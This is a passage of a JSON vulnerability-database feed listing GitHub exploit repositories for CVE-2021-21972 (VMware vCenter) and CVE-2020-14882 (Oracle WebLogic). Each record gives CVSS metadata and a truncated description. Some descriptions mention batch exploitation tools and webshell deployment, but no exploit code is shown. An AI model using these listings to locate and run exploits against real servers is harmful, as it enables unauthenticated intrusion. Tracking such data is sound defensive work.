"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T11:14:58", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-13T12:26:22", "id": "39EADA2B-CE50-555B-910E-D3B77640C464", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:06:27", "description": "### VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972\n\n**zoomeye do...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T07:17:21", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-15T15:41:26", "id": "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:25:59", "description": "# CVE-2021-21972\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T21:30:50", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-30T17:30:38", "id": "626E6774-0ACC-594C-BB61-E89F8F034B11", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:50:02", "description": "## \u4f7f\u7528\u65b9\u6cd5&\u514d\u8d23\u58f0\u660e\r\n\r\nVMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (CVE-2021-21972)\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T10:16:20", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:29:19", "id": "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:19", "description": "# (CVE-2020\u201314882) Weblogic Unauthorized bypass RCE\n(CVE-2020-14...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-01T13:12:27", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-12T00:29:42", "id": "65160BD3-C57E-53F7-BB62-1409E74EB491", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:13:29", "description": "# CVE-2020-14882-GUI\n\n\u521a\u63a5\u89e6\u4e86qt\u6846\u67b6\uff0c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-11T06:52:32", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-05-13T22:02:55", "id": "AE4BD3D3-726F-5F95-8DB4-6630F922B00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:56:26", "description": "<b>[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T13:02:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-08-19T10:39:35", "id": "38ACEE5F-E30D-53CD-B59A-2467D332F915", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:04", "description": "# CVE-2020-14882\n\n## \u53d7\u5f71\u54cd\u7684\u7248\u672c\uff1a 10.3.6.0.0\u300112.1.3.0.0\u300112.2.1.3.0\u300112...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T15:44:23", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-02T01:19:54", "id": "DAF7B187-3A0C-543D-BE33-E65468E5890A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:12", "description": "# cve-2020-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T13:12:28", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-07-01T07:17:20", "id": "01A53B41-499A-535B-8021-CB0329633F46", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:15", "description": "# CVE-2020-14882 checker\n CVE-2020-14882 detection script\n\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T11:34:38", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:48:22", "id": "EEEBEAEA-A8C9-5187-A9DA-A04745A62CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:14", "description": "# CVE-2020-14882\nCVE-2020-14882/14883/14750\n\n# USE\n1. clone...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T03:09:13", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-04-28T08:45:52", "id": "E431282E-5250-58B8-B692-7D184D2EFF7E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:10", "description": "# CVE-2020-14882\n\n\n## coherence shellsession calc.exe\n\n```python...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-30T11:07:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-10-10T21:21:34", "id": "C27DDA07-4A5E-56D3-9950-FD5025E1B777", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:32", "description": "# CVE-2020-1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T06:30:30", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-18T23:00:39", "id": "45775466-2D18-5308-ACCE-40CA731C65D0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:21", "description": "# cve-2020-14882\nBash script to e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T13:53:31", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:46:12", "id": "CFACBEFA-7243-512E-844E-C19B75303CAA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:15:33", "description": "(patched as of around 10/30/20)\n# McMaster-University-Blind-Comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T01:28:41", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-12-04T02:16:03", "id": "8A77E3B6-D786-5618-ACC4-555A5D85D5D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:17:13", "description": "# CVE-2020-14882\u6279\u91cf\u9a8c\u8bc1 #\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-31T01:43:54", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-12-28T09:13:41", "id": "900648E6-9E3A-5883-8D16-DC10AD3DCF6F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:22", "description": "<h1 style=\"font-size:10vw\" align=\"center\"><b>CVE-2020-14882 WebL...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T21:32:36", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-09-16T07:25:25", "id": "E8075733-690E-5B6E-984C-80D074BC5EFF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T16:11:32", "description": "# CVE-2020-14882_Exploit_Gui\n\nCVE-2020-14882_Exploit \u652f\u630112.2.X\u548c10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T09:48:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-27T11:07:48", "id": "C7D1BCF0-3132-5507-B00B-E1843808D5B0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-13T20:22:18", "description": "# CVE-2020-14882\u90e8\u7f72\u51b0\u874e\u5185\u5b58\u9a6c\n\n\u4f17\u6240\u5468\u77e5\uff0cCVE-2020-14882\u662f\u4e00\u4e2a\u672a\u6388\u6743\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5728...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-27T06:29:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-13T15:42:41", "id": "1B25AC3F-FC8A-51FF-BD1B-29BDB73E331D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-08T02:04:26", "description": "# CVE-2020-14882_ALL\r\n\r\nCVE-2020-14882_ALL\u7efc\u5408\u5229\u7528\u5de5\u5177\uff0c\u652f\u6301\u547d\u4ee4\u56de\u663e\u68c0\u6d4b\u3001\u6279\u91cf\u547d\u4ee4\u56de\u663e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 